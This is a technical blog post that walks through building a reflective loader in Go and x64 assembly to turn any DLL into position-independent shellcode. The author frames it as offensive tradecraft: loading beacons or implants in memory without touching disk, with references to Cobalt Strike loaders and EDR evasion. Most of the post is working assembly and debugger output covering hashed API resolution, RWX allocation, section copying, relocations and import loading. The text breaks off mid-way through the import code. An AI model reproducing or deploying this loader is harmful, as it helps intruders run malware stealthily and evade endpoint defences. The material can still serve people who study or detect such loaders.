3. Transforming DLLs into Shellcode

#srdi #golang #assembly #x64 #shellcode #shellcodedevelopment

Introduction

A common technique in offensive security is to reflectively load DLLs in memory, either to spawn a beacon or to add functionality to an existing implant. In some ways this is a stealthier way of executing code, since we don't have to write a DLL to disk and we don't trigger the kernel notification that indicates a new module has been loaded into the process.

Turning the DLL into shellcode also gives us additional flexibility, since we can use our favourite shellcode loaders / injectors to execute the DLL's code.

Fortra recently released an article announcing that Cobalt Strike users can define their own reflective loader to help evade security solutions. Bobby Cooke from IBM X-Force Red has released this article to describe how a user-defined loader was implemented for Cobalt Strike.

Let's do a deep dive into how to write a reflective loader in assembly that turns any DLL into position-independent shellcode.

DLL -> Shellcode

In this article I went through the code for creating a reflective loader in Go. Turning a DLL into shellcode involves taking the bytes of a DLL and appending (or prepending) the loader code described in that article to them.

For this project we will structure the shellcode as shown in the image below:

Once we run the code we hit a jmp instruction. It lets us jump over the DLL bytes and the DLL size to the shellcode where all the magic happens. We could place the reflective loader at the very top and drop the jmp, but that would make development harder, as I would have to keep adjusting the offsets as my shellcode grew.

Our shellcode will then allocate some memory (with VirtualAlloc), copy over the headers and sections, modify a few bits, give the memory execute permissions and, hopefully, the DLL will run.

Pre-requisites

Anyone attempting to follow the next section should be familiar with the following subjects:

Recommendations

I recommend following along in your debugger to truly understand the implementation below. It's hard to follow assembly in a blog 😄

The full code can be found here:

https://github.com/scriptchildie/GoDll2Shellcode

Code Break down

Read DLL bytes

As per the structure we defined, the first instruction in our shellcode is a jmp that takes us to the first line of the reflective loader.

dllBytes, err := os.ReadFile("mydll.dll")
if err != nil {
	log.Fatalf("Failed to open file %v", err)
}

sizeBytes := uint64ToBytes(uint64(len(dllBytes)))

jmpInstruction := fmt.Sprintf("jmp 0x%x;", len(dllBytes)+13)

The above code reads the contents of the DLL file into the byte slice dllBytes. It then converts the length of that slice into a 64-bit unsigned integer and serializes it to bytes.

The last line builds the jmp instruction as a string, in the format keystone-engine expects, so that it can be assembled into opcodes.

So if the DLL is 20 bytes long, the jmp instruction will jump forward 33 bytes:

  • 20 bytes (dll bytes)

  • 8 bytes (the size value at the end of the bytes)

  • 5 bytes for the jmp instruction
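The arithmetic above can be sketched in a few lines of Go. This is only an illustration: jmpTarget is a hypothetical helper, and the body of uint64ToBytes is an assumption (the article uses a helper of that name but does not show it here). Little-endian is assumed because the loader later reads the size back with a plain mov rax, [rdi].

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// jmpLen is the size of a near jmp with a 32-bit displacement (E9 + rel32).
const jmpLen = 5

// sizeLen is the width of the DLL size field stored after the DLL bytes.
const sizeLen = 8

// uint64ToBytes is an assumed implementation of the article's helper of the
// same name: it serializes v as 8 little-endian bytes.
func uint64ToBytes(v uint64) []byte {
	b := make([]byte, sizeLen)
	binary.LittleEndian.PutUint64(b, v)
	return b
}

// jmpTarget (hypothetical helper) returns the offset, measured from the start
// of the shellcode, of the first loader instruction:
// jmp instruction + DLL bytes + size field.
func jmpTarget(dllLen int) int {
	return jmpLen + dllLen + sizeLen
}

func main() {
	dllLen := 20
	fmt.Printf("jmp 0x%x;\n", jmpTarget(dllLen)) // prints "jmp 0x21;" (33 decimal)
	fmt.Println(uint64ToBytes(uint64(dllLen)))
}
```

Keeping the jmp and size widths as named constants makes it obvious where the +13 in the original Sprintf call comes from.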

Shellcode Prologue

"Prologue:",
"	push r12;",		//Push non-volatile registers to stack
"	push r13;",
"	push r14;",
"	push r15;",
"	push rsi;",
"	push rdi;",
"	push rbx;",
"	push rbp;",
"	mov rbp,rsp;",	// move rsp to rbp (use rbp as reference for local variables / not x64 standard)
"	and rsp,0x0FFFFFFFFFFFFFFF0;",	// stack alignment
"	sub rsp,0x200;",			// create stack space

If we want the host program to continue executing after our shellcode has run, we should preserve all non-volatile registers, as required by the Windows x64 calling convention.

  • Lines 2-9: Push all non-volatile registers to the stack.

  • Line 10: This is not best practice on x64, but I find it easier to have rbp as a reference for my local variables.

  • Line 11: Clearing the lowest 4 bits keeps the stack 16-byte aligned. We could face random crashes if the stack is not aligned.

  • Line 12: Create space on the stack for our local variables.
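The effect of lines 11 and 12 is easy to check with plain integer arithmetic. The sketch below is only an illustration in Go; alignDown16 is a hypothetical helper and the stack pointer value is made up.

```go
package main

import "fmt"

// alignDown16 clears the low four bits of its argument, which is what
// `and rsp, 0xFFFFFFFFFFFFFFF0` does to the stack pointer.
func alignDown16(rsp uint64) uint64 {
	return rsp &^ 0xF
}

func main() {
	rsp := uint64(0x68bdff4b8) // hypothetical stack pointer after the pushes
	aligned := alignDown16(rsp)
	fmt.Printf("0x%x -> 0x%x\n", rsp, aligned)
	// Subtracting a multiple of 16 (0x200) keeps the alignment intact.
	fmt.Printf("after sub rsp,0x200: 0x%x\n", aligned-0x200)
}
```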

Calculating offsets

"       lea rdi, [rip - 0x29];",       // Get the address of the dll size
"       mov rax, [rdi];",            //DLL size
"	sub rdi, rax;",                //base address of the raw dll bytes
" 	mov qword ptr [rbp],rax;",    // push size of DLL to stack
" 	mov qword ptr [rbp-8],rdi;",  // push base address of the raw dll bytes to stack
  • Line 1 : Gets the address where our dll size is kept

If you are following along and want to add a breakpoint, add it below this instruction. The instruction addresses the DLL size relative to rip, so anything inserted above it will break the hardcoded 0x29 offset.

  • Line 2: Get the dll size in rax

  • Line 3: Sub the dll size from the address to get the base address of the dll

  • Line 4: Push the dll size to stack

  • Line 5: push base address of the dll to stack

Since my asm code is expected to become very long by the time it's complete, I like to keep an index of what's stored where in the stack in case I would like to access it later on in the code. This is how it looks by the time my shellcode is complete.

/*
		[rbp] 		-> dll size
		[rbp-0x8] 	-> dllPtr base address of the raw dll bytes
		[rbp-0x10]	-> ntdll.dll base address
		[rbp-0x18]	-> kernel32.dll base address
		[rbp-0x20]	-> ntheader address
		[rbp-0x28]	-> fileheader address
		[rbp-0x30]	-> optional header address
		[rbp-0x38]      -> dllBase address
		[rbp-0x40] 	-> deltaImageBase
		[rbp-0x48]      -> CurrentProcess Handle 0xfffffff..
*/

A quick check in WinDbg confirms we have the right values. rax holds 0xb55e, which is 46430 in decimal.

Cross-checking against the size of the DLL on disk confirms that this is the right value.

rdi, in turn, points to the beginning of the DLL.

Finding Kernel32 & GetProcAddress

These functions are explained in detail in my previous blog post.

Reflective loader start

The actual reflective loader code starts below:

"reflective_loader:",
"	xor rax,rax;",
"	mov rdi, [rbp-8];",              // base address of the raw dll bytes
"	mov eax, dword ptr [rdi+0x3c];", // e_lfanew -> eax
"	add rdi,rax;",                   // address of nt header
"	mov qword ptr [rbp-0x20],rdi;",  // store address of nt header on the stack
"	add rdi,0x4;",                   // address of file header
"	mov qword ptr [rbp-0x28],rdi;",  // store address of file header on the stack
"	add rdi,0x14;",                  // address of optional header
"	mov qword ptr [rbp-0x30],rdi;",  // store address of optional header on the stack
"	mov eax, dword ptr [rdi+0x38];", // SizeOfImage -> eax
"	push rax;",                      // push SizeOfImage: rax is overwritten by parse_module
"	mov rax, qword ptr [rdi+0x18];", // ImageBase -> rax
"	push rax;",                      // push ImageBase

The aim of the above code is to find the size of the DLL image, so that we can allocate the right amount of memory in the upcoming VirtualAlloc call.

  • Line 3: Move base address of dll in rdi

  • Line 4: Get the nt header offset to eax.

A quick check to ensure we have the right value in eax:

000001ee`65c6b62d 8b473c          mov     eax,dword ptr [rdi+3Ch] ds:000001ee`65c60041=00000080
0:000> 
000001ee`65c6b630 4801c7          add     rdi,rax
0:000> r eax
eax=80

We can see that the file address of the new exe header (e_lfanew) is 0x80, so we have the right value.

  • Lines 5-10: A series of additions that calculate the addresses of the NT, file and optional headers. We also store them on the stack in case they are needed later.

Let's check that rdi on line 10 holds the address of the optional header. We expect to find the value 0x20B there, the magic number of a PE32+ optional header.

Cross-checking in WinDbg shows the right value. Great.

0:000> dw rdi L1
000001ee`65c6009d  020b

  • Lines 11-14: Move the size of the image to eax and the image base to rax, each followed by a push instruction.

We can see that the desired values are at offsets 0xB0 and 0xD0. When we check the stack, we should find those values stored.

0:000> dq rsp L2
000000a2`551ff7f0  00000003`ae720000 00000000`00013000

VirtualAlloc - Allocate memory for our dll

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);
  • lpAddress will be set to the ImageBase (if available)

  • dwSize will be equal to the Size of Image

  • flAllocationType = MEM_RESERVE | MEM_COMMIT = 0x3000

  • flProtect = PAGE_EXECUTE_READWRITE = 0x40

If you plan on using this code in a real-world engagement, the PAGE_EXECUTE_READWRITE permissions will most likely get investigated by the EDR.

It might also be a better idea to use indirect syscalls to call these functions.

We now have to assign these values to rcx, rdx, r8 and r9 before making the function call.

"call_virtualAlloc:",
"	mov r9,qword ptr [rbp-0x18];", // move kernel32 base address to r9 for parse_module
"	mov r8d, 0x91afca54;",         // VirtualAlloc Hash
"	call parse_module;",           // Search and obtain address of VirtualAlloc
"	pop rcx;",                     // ImageBase to rcx
"	mov rsi,rcx;",                 // save the value for later
"	pop rdx;",                     // SizeOfImage to rdx
"	mov r8, 0x3000;",                //MEM_RESERVE | MEM_COMMIT = 0x3000
"	mov r9, 0x40;",                  //PAGE_EXECUTE_READWRITE = 0x40
"	sub rsp,0x20;", // shadow space
"	call rax;",     // call VirtualAlloc
"	add rsp,0x20;", // restore stack
" 	mov qword ptr [rbp-0x38],rax;", //  push dllBase address to stack
"	sub rax,rsi;",                   // deltaImageBase to be used later
" 	mov qword ptr [rbp-0x40],rax;", //  push deltaImageBase to stack

  • Lines 2-4: Use parse_module to get the address of VirtualAlloc:

  • r9 -> kernel32 base address

  • r8d -> VirtualAlloc hash calculated using this script

  • Line 5: Pop imagebase from the stack to rcx (first argument)

  • Line 7: Pop image size from the stack to rdx ( second argument)

  • Line 8: r8 = 0x3000 (third argument)

  • Line 9: r9 = 0x40 (fourth argument)

  • Lines 10&12: Allocate shadow space as per the x64 calling convention.

  • Line 13: Store the allocated address to the stack

  • Line 14: Calculate the difference between desired address and allocated address (if different). It will be useful later on when we are relocating hardcoded addresses.

  • Line 15: Save the address difference to the stack
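The delta calculation on line 14 relies on unsigned wrap-around, which is worth seeing once with numbers. The Go sketch below is an illustration only: deltaImageBase is a hypothetical helper, and the allocated address and the 0x1234 offset are made-up values.

```go
package main

import "fmt"

// deltaImageBase mirrors `sub rax, rsi`: allocated base minus preferred base.
// Unsigned subtraction wraps around, so adding the delta to a 64-bit address
// still gives the right result when the allocation lands below ImageBase.
func deltaImageBase(allocated, preferred uint64) uint64 {
	return allocated - preferred
}

func main() {
	preferred := uint64(0x3ae720000) // ImageBase from the optional header
	allocated := uint64(0x10000)     // hypothetical VirtualAlloc result below ImageBase
	delta := deltaImageBase(allocated, preferred)

	hardcoded := preferred + 0x1234 // an absolute address baked into the DLL
	fmt.Printf("delta=0x%x relocated=0x%x\n", delta, hardcoded+delta)
}
```

When VirtualAlloc honours the preferred address, as in the WinDbg run shown in this article, the delta is simply zero and the relocation pass leaves every address unchanged.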

Copy DLL Headers

To simplify the Proof of Concept we are using WriteProcessMemory to copy the headers to the destination address. WriteProcessMemory is monitored by most EDRs so it might cause our payload to be flagged. It should be easy enough to write a memcpy function in assembly.

In this section we are using two Windows APIs:

GetCurrentProcess

HANDLE GetCurrentProcess();

This API doesn't take any arguments and always returns the pseudo handle -1 (0xFFF..). We could hardcode this value, but that is not recommended by Microsoft.

"call_currentProcess:",
"   mov r9,qword ptr [rbp-0x18];", // move kernel32 base address to r9 for parse_module
"   mov r8d, 0x7b8f17e6;",         // GetCurrentProcess Hash
"   call parse_module;",           // Search and obtain address of GetCurrentProcess
"   call rax;",                      // call GetCurrentProcess
"   mov qword ptr [rbp-0x48],rax;", //  push Current Process handle to stack

  • Line 2: As with the previous functions, we put the kernel32 base address in r9

  • Line 3: The hash of the function goes in r8d

  • Line 4: Call parse_module to get the function address

  • Line 5: Call rax, where the function address is stored

  • Line 6: Save the returned handle to the stack

WriteProcessMemory

BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
);

Let's have a quick look at what the arguments should be:

  • hProcess = The pseudo handle output from the GetCurrentProcess() function

  • lpBaseAddress = The output from the VirtualAlloc() function

  • lpBuffer = Raw DLL bytes

  • nSize = Size of headers from optional header

  • lpNumberOfBytesWritten = Pointer to the stack.

Let's see how this translates into assembly code.

"call_writeprocessmemory:",         // Write headers to the target address
"       mov r9,qword ptr [rbp-0x18];",  // move kernel32 base address to r9 for parse_module
"       mov r8d, 0xd83d6aa1;",          // WriteProcessMemory Hash
"       call parse_module;",            // Search and obtain address of WriteProcessMemory
"       mov rcx,qword ptr [rbp-0x48];", // current process handle
"	mov rdx,qword ptr [rbp-0x38];",   //dll base
"	mov r8,qword ptr [rbp-0x8];",     // raw bytes of dll
"	xor r9,r9;",
"	push r9;",                       // Placeholder for the bytesWritten
"	mov r9d, dword ptr [rdi+0x3c];", // Size of headers to r9
"       lea rsi, [rsp];",              //place to write the byteswritten
"	push rsi;",
"	sub rsp,0x20;", // shadow space
"	call rax;",     // call WPM
"	add rsp,0x20;", // restore stack

As always, in lines 1-4 we pass the kernel32 base address in r9 and the WriteProcessMemory hash in r8d, and call parse_module.

Now is a good time to refer to our index to find where the desired values are on the stack.

/*
		[rbp] 		-> dll size
		[rbp-0x8] 	-> dllPtr base address of the raw dll bytes
		[rbp-0x10]	-> ntdll.dll base address
		[rbp-0x18]	-> kernel32.dll base address
		[rbp-0x20]	-> ntheader address
		[rbp-0x28]	-> fileheader address
		[rbp-0x30]	-> optional header address
		[rbp-0x38]      -> dllBase address
		[rbp-0x40] 	-> deltaImageBase
		[rbp-0x48]      -> CurrentProcess Handle 0xfffffff..
*/
  • Line 5: Move the pseudo handle to rcx

  • Line 6: Move the DLL base to rdx

  • Line 7: Move the address of the raw DLL bytes to r8

  • Line 10: Move the size of the headers, read from the optional header at offset 0x3c, to r9d

  • Lines 8-9 and 11-12: Push a zero qword onto the stack, get a pointer to it and push that pointer, since this is the 5th argument.

  • Lines 13-15: Create the shadow space, call the function and restore the stack

We have done quite a lot, let's see if we get the values we expect before and after the call instruction in windbg.

0:000> r rcx,rdx,r8,r9 ; dq rsp L1
rcx=ffffffffffffffff rdx=00000003ae720000 r8=0000014afbf00005 r9=0000000000000600
00000006`8bdff490  00000006`8bdff498
0:000> dq 00000006`8bdff498
00000006`8bdff498  00000000`00000000

Everything looks as expected before the call. Let's see if the 0x600 bytes are written to the destination memory after the call.

0:000> dq 00000006`8bdff498 L1 
00000006`8bdff498  00000000`00000600

The variable lpNumberOfBytesWritten is set to 0x600, but let's double-check that the destination memory has the same contents as the buffer.

0:000> db 00000003ae720000 L 30; db 0000014afbf00005 L 30 
00000003`ae720000  4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00  MZ..............
00000003`ae720010  b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00  ........@.......
00000003`ae720020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

0000014a`fbf00005  4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00  MZ..............
0000014a`fbf00015  b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00  ........@.......
0000014a`fbf00025  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

All is looking good :)

Copy DLL Sections

The background knowledge of what we are trying to achieve can be found here and the Go code here.

Let's dive into the assembly

Number of sections

"copy_sections:",                 // Copy sections to the target address
"	mov r13,qword ptr [rbp-0x30];", // Optional header -> r13
"	add r13, 0xf0;",                // Section header = Optional header + 0xf0 -> r13
"	mov rdi,qword ptr [rbp-0x28];", // fileheader address -> rdi
"	mov ax, word ptr [rdi+0x2];",   // FileHeader.NumberOfSections -> ax (upper bits of rax are assumed to be zero here)
"	mov rdi,rax;",                  // keep the counter in rdi: rax is volatile and WriteProcessMemory would overwrite it

Before copying the sections to the destination address, we need to find the address of the section headers and the number of sections.

  • Lines 2-3: The section headers are located at offset +0xf0 from the optional header

  • Line 4: Move the file header address to rdi

  • Line 5: Move the number of sections to ax

  • Line 6: Store the count in rdi

Copy sections loop

"copy_sections_loop:",
"	cmp rdi,0;",                      //check if loop is finished
"	je copy_sections_loop_finished;", // jump out of the loop

"       mov r9,qword ptr [rbp-0x18];", // move kernel32 base address to r9 for parse_module
"       mov r8d, 0xd83d6aa1;",         // WriteProcessMemory Hash
"       call parse_module;",           // Search and obtain address of WriteProcessMemory

"       mov rcx,qword ptr [rbp-0x48];", // current process handle
"	mov rdx,qword ptr [rbp-0x38];",   //dll base
"	xor r12,r12;",                    // 0 -> r12
"	mov r12d,dword ptr [r13+0xc];",   // section.VirtualAddress -> r12d
"	add rdx,r12;",                    // dllbase + sectionVA
		
"	mov r8,qword ptr [rbp-0x8];",    // raw bytes of dll
"	mov r12d,dword ptr [r13+0x14];", // section.PointerToRawData              -> r12d
"	add r8,r12;",                    //dllPtr+section.PointerToRawData
"	xor r9,r9;",
"	push r9;",                       // Placeholder for the bytesWritten
"	mov r9d, dword ptr [r13+0x10];", // SizeOfRawData
"       lea r11, [rsp];",              //place to write the byteswritten
"	push r11;",
"	sub rsp,0x20;", // shadow space
"	call rax;",     // call WPM
"	add rsp,0x20;", // restore stack
	// WPM E
"	dec rdi;",                // rdi--;
"	add r13, 0x28;",          // point to the beginning of the next section header
"	jmp copy_sections_loop;", // next iteration

"copy_sections_loop_finished:",
"	nop;",

The above code might look scary at first, but let's break it down:

  • Line 2: Checks if rdi is zero. rdi holds the number of sections left to copy and is decremented by 1 on each iteration.

  • Line 3: If rdi == 0, all sections have been copied and we break out of the loop by jumping to line 31 (copy_sections_loop_finished).

  • Lines 5-7: Identify WriteProcessMemory using parse_module

WriteProcessMemory args

Let's have a quick look at the arguments we will be passing to WriteProcessMemory:

  • hProcess = The pseudo handle output from the GetCurrentProcess() function

  • lpBaseAddress = Base address + RVA of the section

  • lpBuffer = Base address of Raw DLL bytes + Raw Address

  • nSize = Size of Raw Data

  • lpNumberOfBytesWritten = Pointer to the stack.

  • Line 12: Moves Relative Virtual Address from the section header to r12

  • Line 13: Calculates the Virtual Address by adding base address (from VirtualAlloc)

  • Line 16: Moves the pointer of Raw data to r12

  • Line 17: Adds the base address of the raw bytes

  • Line 20: Moves the size of raw data

Let's have a quick look at the data when the WriteProcessMemory function is called for the first time.

0:000> r rcx,rdx,r8,r9 ; dq rsp L2
rcx=ffffffffffffffff rdx=00000003ae721000 r8=0000014afbf00605 r9=0000000000001600
00000006`8bdff480  00000006`8bdff488 00000000`00000000

The values match the .text section data shown in PE-bear.

  • Line 27: Decrements the section counter by 1

  • Line 28: Adds 0x28 to r13, so that it points to the beginning of the next section header

  • Line 29: Jumps back to the beginning of the loop

Memory Relocations

With all our sections in place, the next task is to find all the hardcoded addresses in our code and add the deltaImageBase we calculated earlier to each of them.

The background knowledge can be found here and the Go code here.

Let's dive into the assembly.

"memory_relocations:",            // start memory relocations
"	mov r13,qword ptr [rbp-0x30];", // Optional header -> r13
"	add r13, 0x98;",                // Points to IMAGE_DIRECTORY_ENTRY_BASERELOC
"	mov eax, dword ptr[r13];",      // relocations.VirtualAddress -> eax
"	add rax,qword ptr [rbp-0x38];", // relocation_table
"	xor rdi,rdi;",                  // relocations_processed counter

"memory_relocations_loop:",
"	mov rsi,rax;",
"	add rsi,rdi;",                //relocation block (relocation_table + relocations processed) -> rsi
"	mov r8d, dword ptr [rsi];",   //PAGERVA
"	mov r9d, dword ptr [rsi+4];", //BlockSize
"	mov rcx,r9;",                 //Block size -> rcx
"	sub rcx,0x8;",                // BlockSize-8 -> rcx
"	shr rcx,1;",                  // (BlockSize-8)/2 -> rcx
"	xor r10,r10;",
"	or r10d,r9d;",
"	or r10d,r8d;",
"	test r10d,r10d;", //check r10d is zero
"	jz exit_relocations_loop;",
"	add rsi, 0x8;", // relocEntry

"relocation_entries_loop:",
"	cmp rcx,0;",
"	je relocation_entries_loop_end;", // jump out of the loop
"	mov r11d,dword ptr [rsi];",
"	and r11d,0xf000;",
"	shr r11d,12;",                             //type -> r11
"	test r11,r11;",                            //test if r11 is 0
"	jz relocation_entries_loop_inc_counters;", //continue

"	mov r11d,dword ptr [rsi];", // entry -> r11d
"	and r11d,0xfff;",           // offset within the page -> r11d
"	mov r13,r8;",
"	add r13,r11;", //relocationRVA
"	add r13, qword ptr[rbp-0x38];", //absolute address of relocation
"	mov r12, qword ptr[r13];",      // address to patch -> r12
"	add r12, qword ptr[rbp-0x40];", // address to patch + delta
"	mov qword ptr[r13], r12;",      // patch

"relocation_entries_loop_inc_counters:",
"	dec rcx;",
"	add rsi, 0x2;",
"	jmp relocation_entries_loop;",

//end of relocations entries loop
"relocation_entries_loop_end:",
"	add rdi,r9;",                  // point to the next relocationblock
"	jmp memory_relocations_loop;", //iterate

"exit_relocations_loop:",

The code is fairly long but let's break it down.

We have an outer loop (memory_relocations_loop) that iterates over the relocation blocks and, within each block, an inner loop that iterates over the entries.

For the mydll.dll example, this is what the relocations look like:

The outer loop will run 4 times, as can be seen at the very top. The inner loop for the block at offset 0x360C will iterate over its 0x10 (16) entries.

Address of relocations

"memory_relocations:",            // start memory relocations
"	mov r13,qword ptr [rbp-0x30];", // Optional header -> r13
"	add r13, 0x98;",                // Points to IMAGE_DIRECTORY_ENTRY_BASERELOC
"	mov eax, dword ptr[r13];",      // relocations.VirtualAddress ->rax
"	add rax,qword ptr [rbp-0x38];", // relocation_table
"	xor rdi,rdi;",                  // relocations_processed counter
  • Line 3: Relocation Blocks RVA is located at offset 0x98 from the beginning of the optional header.

  • Line 4: RVA Value stored in eax

  • Line 5: Add base address to get the relocation_table address in memory

  • Line 6: Zero rdi to use as a loop counter in the next section

Relocations Block (Outer Loop)

"memory_relocations_loop:",
"	mov rsi,rax;",                // relocation_table
"	add rsi,rdi;",                //relocation block (relocation_table + relocations processed) -> rsi
"	mov r8d, dword ptr [rsi];",   //PAGERVA
"	mov r9d, dword ptr [rsi+4];", //BlockSize
"	mov rcx,r9;",                 //Block size -> rcx
"	sub rcx,0x8;",                // BLocksize-8 ->rcx
"	shr rcx,1;",                  // Blocksize/2 -> rcx
"	xor r10,r10;",
"	or r10d,r9d;",
"	or r10d,r8d;",
"	test r10d,r10d;", //check r10d is zero
"	jz exit_relocations_loop;",
"	add rsi, 0x8;", // relocEntry
...
...

"	add rdi,r9;",                  // point to the next relocationblock
"	jmp memory_relocations_loop;", //iterate

"exit_relocations_loop:",
  • Line 2: Move the relocation_table address to rsi

  • Line 3: Add rdi (the number of bytes processed so far) to rsi, so that it points to the current relocation block

  • Line 4: Move PAGERVA into r8d

  • Line 5: Move BlockSize into r9d

  • Lines 6-8: relocationsCount := (relocation_block.BlockSize - 8) / 2

We are essentially turning the relocation block size into the number of relocation entries in the block. This will be used later in the inner loop.

  • Line 7: Subtracts 8 (the size of the block header) from the block size in rcx

  • Line 8: Shifts rcx right by 1 bit, which divides the value by 2 (each entry is 2 bytes)

  • Lines 9-12: OR PAGERVA and BlockSize together and test whether the result is zero

  • Line 13: If both values are zero we have reached the end of the table and the loop exits

  • Line 14: Otherwise we add 0x8 to rsi to get the address of the first relocation entry

  • Line 15: This is where our inner loop sits, iterating over the entries

  • Line 18: Adds the block size to rdi in order to reach the next block on the next iteration

  • Line 19: Jumps back to the beginning of the loop

When writing loops it makes sense to set a breakpoint, on line 14 in this case, to make sure that rsi points to the first entry of each block.

Another breakpoint at exit_relocations_loop confirms that the loop exits when we expect it to.

A quick check confirms that our loop performs as expected:

0:000> bp 0000014a`fbf0b775
0:000> g
Breakpoint 0 hit
0000014a`fbf0b775 4883c608        add     rsi,8
0:000> p
0000014a`fbf0b779 4883f900        cmp     rcx,0
0:000> dw rsi L1 
00000003`ae72c008  a558
..
0:000> dw rsi L1 
00000003`ae72c014  a010

Relocation Entries Loop (inner loop)

"relocation_entries_loop:",
"	cmp rcx,0;",
"	je relocation_entries_loop_end;", // jump out of the loop
"	mov r11d,dword ptr [rsi];",
"	and r11d,0xf000;",
"	shr r11d,12;",                             //type -> r11
"	test r11,r11;",                            //test if r11 is 0
"	jz relocation_entries_loop_inc_counters;", //continue

"	mov r11d,dword ptr [rsi];", // entry -> r11d
"	and r11d,0xfff;",           // offset within the page -> r11d
"	mov r13,r8;", // r8 holds page RVA
"	add r13,r11;", //relocationRVA

"	add r13, qword ptr[rbp-0x38];", //absolute address of relocation
"	mov r12, qword ptr[r13];",      // address to patch -> r12
"	add r12, qword ptr[rbp-0x40];", // address to patch + delta
"	mov qword ptr[r13], r12;",      // patch

"relocation_entries_loop_inc_counters:",
"	dec rcx;",
"	add rsi, 0x2;",
"	jmp relocation_entries_loop;",
  • Line 2: rcx holds the number of entries left in the block and is decremented on every iteration. Comparing it to 0 checks whether we have already looped through all the entries.

  • Line 3: If rcx is zero, jump out of the inner loop and back into the outer loop

  • Line 4: Moves the entry value to r11d

Let's assume r11d now has the value 0xA558.

  • Line 5: Zeroes the lowest 12 bits, leaving the value 0xA000 in r11d

  • Line 6: Shifts right by 12 bits, turning r11d into 0x000A, the relocation type

  • Line 7: Checks if the type is zero

  • Line 8: If it is, continues with the next entry by jumping to the end of the loop body, where our counters are adjusted

  • Line 10: Identical to line 4, moving the entry value to r11d

Once again let's assume the value is 0xA558.

  • Line 11: Zeroes the top 4 bits, leaving the value 0x558 in r11d. This value is the offset from the beginning of the page.

  • Line 12: Move the page RVA to r13

  • Line 13: Add the offset to the page RVA to get the relocation RVA relative to the DLL base address

  • Line 15: Add the DLL base address to the relocation RVA to get the absolute address

  • Line 16: Read the actual hardcoded address from memory into r12

  • Line 17: Add the delta, calculated and stored on the stack previously, to the hardcoded address

  • Line 18: Patch the address in memory

  • Line 21: Decrease the relocation entries counter

  • Line 22: Point to the next relocation entry in the block

Imports

The last step in our shellcode is to import all external dependencies. Once again we will need 2 loops just like we did for the relocations. As we can see from the Import tab in PE-bear, we have an entry for each DLL and then a list of functions for each dll.

Our outer loop will loop through the dlls, and the inner loop will loop through the functions and import them as required.

In the outer loop we will need to use an api such as LoadLibrary or LdrLoadDll to load the required dlls and then we can use our parse_module function to get the address of each function.

Let's see how the code looks in assembly.

"imports:",
"	mov r13,qword ptr [rbp-0x30];", // Optional header -> r13
"	add r13, 0x78;",                // Points to IMAGE_DIRECTORY_ENTRY_IMPORT
"	mov r12d, dword ptr[r13];",     // imports.VirtualAddress -> r12d
"	add r12,qword ptr [rbp-0x38];", // Import Descriptor address

"imports_loop:",
//r12 -> import descriptor address

"	mov r13, r12;",                  // r13 points to the beginning of the import descriptor
"	add r13, 0x0c;",                 // offset 0xc points to the name RVA
"	mov r13d, dword ptr[r13];",      // dereference to get RVA value to r13
"	cmp r13d, 0x0;",                 // check if RVA is 0
"	je exit_imports_loop;",          // exit loop if RVA == 0
"	add r13, qword ptr [rbp-0x38];", // dll name address
"	mov rsi,r13;",                   // used by lodsb

/*
   typedef struct _UNICODE_STRING {
     USHORT Length;
     USHORT MaximumLength;
     PWSTR  Buffer;
     } UNICODE_STRING, *PUNICODE_STRING;
*/

"	xor rax,rax;", // used by lodsb
"	xor r11,r11;", // size
"	push rax;",    // Creating a space of 0s for the Unicode String Buffer
"	push rax;",
"	push rax;",
"	push rax;",
"	push rax;",
"	push rax;",
"	push rax;",
"	push rax;",
"	push rax;",
"	push rax;",
"	push rax;",

"loop_through_DLL:",            // Iterate over each byte
"	lodsb;",                      // Copy the next byte of RSI to AL
"	test al, al;",                // If reaching the end of the string
"	jz end_loop_through_DLL;",    //
"	mov byte ptr [rsp+r11], al;", // In the buffer we write the dll name bytes in every second byte. (0s in between K.E.R.N.E.L.3.2.D.L.L..)
"	add r11w,0x2;",
"	jmp loop_through_DLL;", // Next byte

"end_loop_through_DLL:", // End of the dll name reached
"	add r11w, 0x2;", // MaximumLength
"	mov ax,r11w;",
"	shl rax,16;",
"	sub r11w, 0x2;",  // Length
"	or rax,r11;",     // first qword is the length and max length
"	lea rsi, [rsp];", // pointer to the buffer
"	push rsi;",       // push pointer to the stack
"	push rax;",       // push lengths to the stack to form the UNICODE_STRING
"       lea rsi, [rsp];", // Pointer to the UNICODE_STRING
"	push rsi;",         // unicode string of the dll
"       mov r9,qword ptr [rbp-0x10];", // move ntdll base address to r9 for parse_module
"       mov r8d, 0xb0988fe4;",         // LdrLoadDll Hash

"       call parse_module;", // Search and obtain address of LdrLoadDll
"	xor rcx,rcx;",
"	inc rcx;",    // first arg 1
"	pop r8;",     // third arg Pointer to the unicode string on the stack
" 	xor r9,r9;", // 0 -> r9
"	push r9;",
"       lea rdx, [rsp];", // second arg null pointer
"       lea r9, [rsp];",  // fourth argument pointer the dll base address
"	mov rsi, r9;",

"	sub rsp,0x20;",         // shadow space
"	call rax;",             // call LdrLoadDll
"	add rsp,0x20;",         // restore stack
"	push r12;",             // import descriptor address -> stack
"	push qword ptr [rsi];", // address of dll to stack
"	mov r12d, dword ptr[r12+0x10];",
"	add r12,qword ptr [rbp-0x38];",

"inner_import_loop:",
"	mov r13d, dword ptr[r12];",      //dereference to get RVA value to r13
"	cmp r13d, 0x0;",                 //check if RVA is 0
"	je exit_inner_import_loop;",     // exit loop if RVA ==0
"	add r13, qword ptr [rbp-0x38];", //
"	add r13,0x2;",
"	mov rsi,r13;",

//"function_hashing:", // Hash function name function
"	xor rax, rax;",
"	xor rdx, rdx;",
"	cld;", // Clear DF flag

"iteration2:",          // Iterate over each byte
"	lodsb;",             // Copy the next byte of RSI to AL
"	test al, al;",       // If reaching the end of the string
"	jz getProcAddress;", // Hash complete, resolve the function
"	ror edx, 0x0d;",     // Part of hash algorithm
